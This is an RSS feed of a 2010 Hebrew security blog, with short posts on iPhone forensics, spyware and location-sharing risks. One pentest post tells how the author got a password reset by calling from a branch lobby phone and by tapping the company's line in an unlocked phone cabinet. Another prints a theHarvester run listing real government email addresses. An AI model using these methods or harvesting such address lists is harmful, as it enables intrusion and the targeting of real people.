<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>&#8235;ZuLL, יומנו של האקר.&#8236;</title>	<atom:link href="http://guym.co.il/feed" rel="self" type="application/rss+xml" />
	<link>http://guym.co.il</link>
	<description>&#8235;יומנו של האקר הוקם על ידי גיא מזרחי וכיום כותבים בו גם חוקרי אבטחת מידע נוספים.&#8236;</description>	<lastBuildDate>Thu, 11 Mar 2010 03:26:10 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=abc</generator>
	<language>he</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>&#8235;iPhone Forensics&#8236;</title>		<link>http://guym.co.il/1282?nucrss=1</link>
		<comments>http://guym.co.il/1282#comments</comments>
		<pubDate>Thu, 11 Mar 2010 03:26:09 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1282</guid>
		<description><![CDATA[&#8235;חברת Katana Software הוציאה מוצר מעניין לביצוע חקירות פורנזיות ל-iPhone.
המוצר נקרא Lantern  והוא יודע לבצע כמה דברים מאוד מעניינים.
מי שמכיר כלים פורנזיים יודע שבד&#34;כ מדובר בכלים מאוד מאוד יקרים. הכלי הזה עולה 400$, מחיר סביר מאוד.
הוא יודע להוציא כל מידע שאתם צריכים מתוך המכשיר וגם יש לו תוספות נחמדות.
אחד הדברים שלמדתי מהכלי הזה הוא [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1282&crtId=148&dt=1268434921">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>חברת Katana Software הוציאה מוצר מעניין לביצוע חקירות פורנזיות ל-iPhone.</p>
<p>המוצר נקרא <a href="http://katanaforensics.com/use-our-tools/" target="_blank">Lantern </a> והוא יודע לבצע כמה דברים מאוד מעניינים.</p>
<p>מי שמכיר כלים פורנזיים יודע שבד&quot;כ מדובר בכלים מאוד מאוד יקרים. הכלי הזה עולה 400$, מחיר סביר מאוד.</p>
<p>הוא יודע להוציא כל מידע שאתם צריכים מתוך המכשיר וגם יש לו תוספות נחמדות.</p>
<p>אחד הדברים שלמדתי מהכלי הזה הוא שיש קובץ באייפון שפשוט שומר את כל הקשות המקלדת שלכם. כן, זה Keylogger מובנה מבית אפל באייפון.</p>
<p>כיוון שאין לי MAC, הייתי צריך להפעיל את זה על VM והחוויה נפגמת מעט בשל הצורך לחבר את האייפון ל-VM ויש לא מעט איטיות בתהליך.</p>
<p>גיבוי המכשיר שלי לקח כ-35 דקות.</p>
<p>בהחלט, מוצר מעניין למי שצריך לחקור אייפון.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1282&crtId=148&dt=1268434921"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1282/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>&#8235;שדוד אותי.קום&#8236;</title>		<link>http://guym.co.il/1278?nucrss=1</link>
		<comments>http://guym.co.il/1278#comments</comments>
		<pubDate>Wed, 10 Mar 2010 06:51:40 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1278</guid>
		<description><![CDATA[&#8235;למה לא לעדכן רשתות חברתיות כשאתם יוצאים לטיול?
בגלל שיש אתרים כאלה:
http://pleaserobme.com.
אני יודע שיש אנשים שחושבים שזה ממש חשוב לספר איפה הם בכל רגע של היום כי זה כנראה מעניין את כולנו (לא! תפנימו, זה לא מעניין!).
הרעיון זה שכשהם מעדכנים שהם במסעדת הדוד זרובבל ואוכלים כרגע זורבה, הם כנראה לא בבית.
מה נשאר לאנשים פחות חביבים לעשות? [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1278&crtId=148&dt=1268434921">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>למה לא לעדכן רשתות חברתיות כשאתם יוצאים לטיול?</p>
<p>בגלל שיש אתרים כאלה:</p>
<p><a href="http://pleaserobme.com" target="_blank">http://pleaserobme.com</a>.</p>
<p>אני יודע שיש אנשים שחושבים שזה ממש חשוב לספר איפה הם בכל רגע של היום כי זה כנראה מעניין את כולנו (לא! תפנימו, זה לא מעניין!).</p>
<p>הרעיון זה שכשהם מעדכנים שהם במסעדת הדוד זרובבל ואוכלים כרגע זורבה, הם כנראה לא בבית.</p>
<p>מה נשאר לאנשים פחות חביבים לעשות? ללכת לבקר את הבית שלהם <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1278&crtId=148&dt=1268434921"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1278/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>&#8235;איך נהלי אבטחה חושפים חברה לבעיות אבטחה?&#8236;</title>		<link>http://guym.co.il/1274?nucrss=1</link>
		<comments>http://guym.co.il/1274#comments</comments>
		<pubDate>Thu, 04 Mar 2010 12:54:57 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1274</guid>
		<description><![CDATA[&#8235;לפני כמה שבועות ביצעתי PENTEST בחברה מסויימת.
אחד הנהלים שם הוא ששיחות למרכז התמיכה שלהם בנוגע לסיסמאות יכולות לקבל מענה רק מתוך החברה (שיחה מזוהה).
לחברה יש כמה סניפים גדולים וישנם די הרבה סניפים נוספים, חלקם ממש קטנים.
אז איך מאפסים סיסמאות בחברה כזו? מניחים שגם עובדי הסניף זכאים לקבל תמיכה.
אחד המשרדים הקטנים היה בבניין מוזנח בסביבות תל [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1274&crtId=148&dt=1268434921">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>לפני כמה שבועות ביצעתי PENTEST בחברה מסויימת.</p>
<p>אחד הנהלים שם הוא ששיחות למרכז התמיכה שלהם בנוגע לסיסמאות יכולות לקבל מענה רק מתוך החברה (שיחה מזוהה).</p>
<p>לחברה יש כמה סניפים גדולים וישנם די הרבה סניפים נוספים, חלקם ממש קטנים.</p>
<p>אז איך מאפסים סיסמאות בחברה כזו? מניחים שגם עובדי הסניף זכאים לקבל תמיכה.</p>
<p>אחד המשרדים הקטנים היה בבניין מוזנח בסביבות תל אביב.</p>
<p>הלכתי לשם, נכנסתי לבניין ואחרי שנייה הבנתי איך אני מאפס סיסמאות של משתמשים.</p>
<p>שיחה א' למחלקת התמיכה:</p>
<p>שלום, מדבר X. אני לא מצליח להתחברלמחשב.</p>
<p>אחרי כמה בדיקות התומך החליט שכדאי שיאפסו לי סיסמה. הבעיה? אני מטלפון נייד. הנוהל לא מאפשר לעשות את זה.</p>
<p>אני שואל מה הוא מציע והוא אומר לי לגשת לסניף הקרוב ולהתקשר משם.</p>
<p>בסניף היה קל. שאלתי אם משה נמצא ושאלו אותי איזה משה. הייתי צריך לברר אז ביקשתי להשתמש בטלפון שלהם כי לשלי נגמרה הסוללה.</p>
<p>נתנו לי לחייג לבד מהטלפון בלובי שלהם ואפילו השאירו אותי לבד לכמה דקות. סיסמה א' אופסה. <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>רציתי לראות אם יש עוד דרך.</p>
<p>יצאתי החוצה ובתחתית הבניין יש ארון של בזק. מעץ. לא נעול. הדלת אפילו קצת פתוחה.</p>
<p>טלפון פשוט = 35 ש&quot;ח. שני קרוקודילים = 5 ש&quot;ח. שיחת טלפון מהמספר של החברה בלי להיות בתוכה ובלי שאף אחד ישאל אותי מה אני עושה? PRICELESS.</p>
<p>הייתם חושבים שאצטרך כמה נסיונות עם החוטים שיש שם? על הדלתות הטכנאים של בזק רושמים איזה קו הולך לאיזו חברה. פשוט נהדר <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>הרעיון הוא שברגע שהטכנאי שעזר לי &quot;הטריח&quot; אותי לגשת לסניף הקרוב וכ&quot;ו, הוא ויתר על אמצעי הזיהוי הנוספים. אני הרי בטוח עובד החברה. הוא זיהה אותי על פי מספר הטלפון.</p>
<p>מצטער על איכות הצילום..</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/03/IMG_0154.jpg"><img class="aligncenter size-large wp-image-1275" title="טלפון" src="http://guym.co.il/wp-content/uploads/2010/03/IMG_0154-768x1024.jpg" alt="" width="768" height="1024" /></a></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1274&crtId=148&dt=1268434921"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1274/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>&#8235;גרסה חדשה של theharvester&#8236;</title>		<link>http://guym.co.il/1272?nucrss=1</link>
		<comments>http://guym.co.il/1272#comments</comments>
		<pubDate>Thu, 25 Feb 2010 10:13:48 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1272</guid>
		<description><![CDATA[&#8235;theharvester הוא כלי מאוד חביב לאיסוף מידע על יעד לפני תקיפה (reconnaissance).
זה בעצם סקריפט python שיודע לסרוק ולחפש ב-google,bing ו-linked in כתובות מייל לפי דומיין שאתם רוצים. עוד מקור שהוא יודע לסרוק בו הוא שרתי PGP.
דוגמה אחת, על דומיינים gov.il נותנת את התוצאה הבאה (הגבלה ל-500 תוצאות ראשונות בגוגל):
./theHarvester.py -d gov.il  -l 500 -b google
*************************************
*TheHarvester [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1272&crtId=148&dt=1268434921">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p><a href="http://www.edge-security.com/soft/theHarvester-1.5.tar" target="_blank">theharvester </a>הוא כלי מאוד חביב לאיסוף מידע על יעד לפני תקיפה (reconnaissance).<br />
זה בעצם סקריפט python שיודע לסרוק ולחפש ב-google,bing ו-linked in כתובות מייל לפי דומיין שאתם רוצים. עוד מקור שהוא יודע לסרוק בו הוא שרתי PGP.<br />
דוגמה אחת, על דומיינים gov.il נותנת את התוצאה הבאה (הגבלה ל-500 תוצאות ראשונות בגוגל):</p>
<p style="text-align: left;" dir="ltr">./theHarvester.py -d gov.il  -l 500 -b google</p>
<p style="text-align: left;">*************************************</p>
<p style="text-align: left;" dir="ltr">*TheHarvester Ver. 1.5              *</p>
<p style="text-align: left;" dir="ltr">*Coded by Christian Martorella      *</p>
<p style="text-align: left;" dir="ltr">*Edge-Security Research             *</p>
<p style="text-align: left;" dir="ltr"><a href="mailto:*cmartorella@edge-security.com">*cmartorella@edge-security.com</a> *</p>
<p style="text-align: left;">*************************************</p>
<p style="text-align: left;" dir="ltr">Searching for gov.il in google :</p>
<p style="text-align: left;">======================================</p>
<p style="text-align: left;">
<p style="text-align: left;">Total results:  110000000</p>
<p style="text-align: left;">Limit:  500</p>
<p style="text-align: left;">Searching results: 0</p>
<p style="text-align: left;">Searching results: 100</p>
<p style="text-align: left;">Searching results: 200</p>
<p style="text-align: left;">Searching results: 300</p>
<p style="text-align: left;">Searching results: 400</p>
<p style="text-align: left;" dir="ltr">Accounts found:</p>
<p style="text-align: left;">====================</p>
<p style="text-align: left;"><a href="mailto:arieo@iibr.gov.il">arieo@iibr.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:pn...@moin.gov.il">pn&#8230;@moin.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:shadmiz@mot.gov.il">shadmiz@mot.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:prashkerj@mot.gov.il">prashkerj@mot.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:zarivatch@israeltrade.gov.il">zarivatch@israeltrade.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:attache.sg@israeltrade.gov.il">attache.sg@israeltrade.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:shlomosa@most.gov.il">shlomosa@most.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:elanza@sviva.gov.il">elanza@sviva.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:fkirshenbaum@knesset.gov.il">fkirshenbaum@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:drotem@knesset.gov.il">drotem@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:lshemtov@knesset.gov.il">lshemtov@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:izchakec@knesset.gov.il">izchakec@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:amichaeli@knesset.gov.il">amichaeli@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:ravraham@knesset.gov.il">ravraham@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:radato@knesset.gov.il">radato@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:yedri@knesset.gov.il">yedri@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:nhorowitz@knesset.gov.il">nhorowitz@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:eaflalo@knesset.gov.il">eaflalo@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:mshitrit@knesset.gov.il">mshitrit@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:ggamliel@knesset.gov.il">ggamliel@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:ddanon@knesset.gov.il">ddanon@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:zhotovely@knesset.gov.il">zhotovely@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:mgafni@knesset.gov.il">mgafni@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:ylitzman@knesset.gov.il">ylitzman@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:yaakovy@cbs.gov.il">yaakovy@cbs.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:HEB@it.pmo.gov.il">HEB@it.pmo.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:legal@pmo.gov.il">legal@pmo.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:shmuelh@knesset.gov.il">shmuelh@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:ycohen@knesset.gov.il">ycohen@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:israel@geneva.mfa.gov.il">israel@geneva.mfa.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:spokesperson@president.gov.il">spokesperson@president.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:pm_eng@pmo.gov.il">pm_eng@pmo.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:eulmert@knesset.gov.il">eulmert@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:bnetanyahu@knesset.gov.il">bnetanyahu@knesset.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:minister@mod.gov.il">minister@mod.gov.il</a></p>
<p style="text-align: left;"><a href="mailto:rond@pmo.gov.il">rond@pmo.gov.il</a></p>
<p style="text-align: left;">====================</p>
<p style="text-align: left;">Total results:  36</p>
<p style="text-align: left;">
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1272&crtId=148&dt=1268434921"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1272/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>&#8235;מי היה מתקין לעצמו כזה דבר??&#8236;</title>		<link>http://guym.co.il/1270?nucrss=1</link>
		<comments>http://guym.co.il/1270#comments</comments>
		<pubDate>Thu, 25 Feb 2010 08:51:18 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1270</guid>
		<description><![CDATA[&#8235;תראו את התוכנה הזו:
http://www.iphoneil.net/?p=35996
רק תתקינו ומאז אפשר להיכנס פה.
http://www.ownspy.com/login.php
ואני שואל, כמה צריך לסמוך על חברה כזו כדי לתת לה גישה ברמה כזו לאייפון שלכם?
ואו, יש אנשים תמימים..
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1270&crtId=148&dt=1268434921">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>תראו את התוכנה הזו:</p>
<p>http://www.iphoneil.net/?p=35996</p>
<p>רק תתקינו ומאז אפשר להיכנס פה.</p>
<p>http://www.ownspy.com/login.php</p>
<p>ואני שואל, כמה צריך לסמוך על חברה כזו כדי לתת לה גישה ברמה כזו לאייפון שלכם?<br />
ואו, יש אנשים תמימים..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1270&crtId=148&dt=1268434921"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1270/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>&#8235;יוסי וליאור מוכרות&#8236;</title>		<link>http://guym.co.il/1267?nucrss=1</link>
		<comments>http://guym.co.il/1267#comments</comments>
		<pubDate>Thu, 25 Feb 2010 08:47:43 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1267</guid>
		<description><![CDATA[&#8235;זה פשוט מצחיק 

<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1267&crtId=148&dt=1268434921">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>זה פשוט מצחיק <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
<object width="560" height="340"><param name="movie" value="http://www.youtube.com/v/mx3gksxiyAs&#038;hl=en_US&#038;fs=1&#038;"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/mx3gksxiyAs&#038;hl=en_US&#038;fs=1&#038;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="560" height="340"></embed></object></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1267&crtId=148&dt=1268434921"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1267/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>&#8235;איך אפשר לבדוק אם אתם בגיל מתאים לראות פורנו?&#8236;</title>		<link>http://guym.co.il/1265?nucrss=1</link>
		<comments>http://guym.co.il/1265#comments</comments>
		<pubDate>Tue, 23 Feb 2010 09:00:58 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1265</guid>
		<description><![CDATA[&#8235;חבר שלח לי אתר(זהירות! אתר פורנו ולכן אין לינק!):
http://mporn.co.il/smsvideocard-main-heb-1-1.html
מה שמעניין שם זה שאם אתם רוצים להירשם לשירות, האתר מוודא שאתם בגיל המתאים.
לצורך כך האתר מבקש את תעודת הזהות שלכם ואת שנת הלידה שלכם ולאחר מכן הוא מוודא שתעודת הזהות אכן מוצלבת עם שנת הלידה הנכונה.
אני תוהה איך הם עושים הצלבה כזו?
אם הייתי צריך לנחש &#8211; [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1265&crtId=148&dt=1268434921">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>חבר שלח לי אתר(זהירות! אתר פורנו ולכן אין לינק!):</p>
<p>http://mporn.co.il/smsvideocard-main-heb-1-1.html</p>
<p>מה שמעניין שם זה שאם אתם רוצים להירשם לשירות, האתר מוודא שאתם בגיל המתאים.</p>
<p>לצורך כך האתר מבקש את תעודת הזהות שלכם ואת שנת הלידה שלכם ולאחר מכן הוא מוודא שתעודת הזהות אכן מוצלבת עם שנת הלידה הנכונה.</p>
<p>אני תוהה איך הם עושים הצלבה כזו?</p>
<p>אם הייתי צריך לנחש &#8211; מדובר ב-DB דוגמת אגרון או מרשם.</p>
<p>מה אתם חושבים? יש לכם רעיון איך מימשו את הבדיקה ללא שימוש במאגר?</p>
<p>אם זה באמת המצב (שימוש במאגר כגון אגרון) &#8211; אני חושב שזו חוצפה שמאגר כזה משמש חברה מסחרית בצורה כל כך גלויה ומחוצפת.</p>
<p>מרגיז!</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1265&crtId=148&dt=1268434921"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1265/feed</wfw:commentRss>
		<slash:comments>23</slash:comments>
		</item>
		<item>
		<title>&#8235;מי פרץ לגוגל?&#8236;</title>		<link>http://guym.co.il/1262?nucrss=1</link>
		<comments>http://guym.co.il/1262#comments</comments>
		<pubDate>Tue, 23 Feb 2010 03:47:43 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1262</guid>
		<description><![CDATA[&#8235;האחראי לקוד הוא כנראה חוקר אבטחה פרילנסר שקשור לממשל והצבא הסיני.
היה לממשל גישה לעבודה שלו וכנראה כך הצליחו לייצר את ההתקפה.
איך עלו על זה ומצאו אותו? הבחור פרסם חלקים מהקוד באתר האקינג כלשהו וכתב שזו עבודה בתהליך.
פרטים נוספים:
http://www.readwriteweb.com/archives/chinese_hacker_behind_google_attack_found.php#comments
ויותר בהרחבה פה:
http://www.ft.com/cms/s/0/a6f5621c-1f21-11df-9584-00144feab49a.html?nclick_check=1
תודה לנחום ששלח לי.
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1262&crtId=148&dt=1268434921">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>האחראי לקוד הוא כנראה חוקר אבטחה פרילנסר שקשור לממשל והצבא הסיני.</p>
<p>היה לממשל גישה לעבודה שלו וכנראה כך הצליחו לייצר את ההתקפה.</p>
<p>איך עלו על זה ומצאו אותו? הבחור פרסם חלקים מהקוד באתר האקינג כלשהו וכתב שזו עבודה בתהליך.</p>
<p>פרטים נוספים:</p>
<p><a href="http://www.readwriteweb.com/archives/chinese_hacker_behind_google_attack_found.php#comments">http://www.readwriteweb.com/archives/chinese_hacker_behind_google_attack_found.php#comments</a></p>
<p>ויותר בהרחבה פה:</p>
<p><a href="http://www.ft.com/cms/s/0/a6f5621c-1f21-11df-9584-00144feab49a.html?nclick_check=1">http://www.ft.com/cms/s/0/a6f5621c-1f21-11df-9584-00144feab49a.html?nclick_check=1</a></p>
<p>תודה לנחום ששלח לי.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1262&crtId=148&dt=1268434921"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1262/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8235;כתב טכנולוגי? צור קשר..&#8236;</title>		<link>http://guym.co.il/1260?nucrss=1</link>
		<comments>http://guym.co.il/1260#comments</comments>
		<pubDate>Mon, 22 Feb 2010 09:44:17 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1260</guid>
		<description><![CDATA[&#8235;יש לי משהו מעניין שרציתי לשתף בו את אחד מכתבי הטכנולוגיה.
מכרז &#8211; מי מעוניין?
למייל שלי: guy[at]hacking.org.il
תודה  
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1260&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>יש לי משהו מעניין שרציתי לשתף בו את אחד מכתבי הטכנולוגיה.</p>
<p>מכרז &#8211; מי מעוניין?</p>
<p>למייל שלי: guy[at]hacking.org.il</p>
<p>תודה <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1260&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1260/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8235;פריצת מנעולים בקלות&#8236;</title>		<link>http://guym.co.il/1257?nucrss=1</link>
		<comments>http://guym.co.il/1257#comments</comments>
		<pubDate>Fri, 19 Feb 2010 07:29:02 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1257</guid>
		<description><![CDATA[&#8235;ניב שלח לי סרטון שמראה כלי מגניב ביותר פריצת מנעולים.
כלי ממש חביב 

<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1257&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>ניב שלח לי סרטון שמראה כלי מגניב ביותר פריצת מנעולים.</p>
<p>כלי ממש חביב <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://www.youtube.com/v/43EtAgFSso0&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/43EtAgFSso0&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1257&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1257/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>&#8235;מה ל-WALLA ולאתר סקס?&#8236;</title>		<link>http://guym.co.il/1252?nucrss=1</link>
		<comments>http://guym.co.il/1252#comments</comments>
		<pubDate>Wed, 03 Feb 2010 09:53:21 +0000</pubDate>
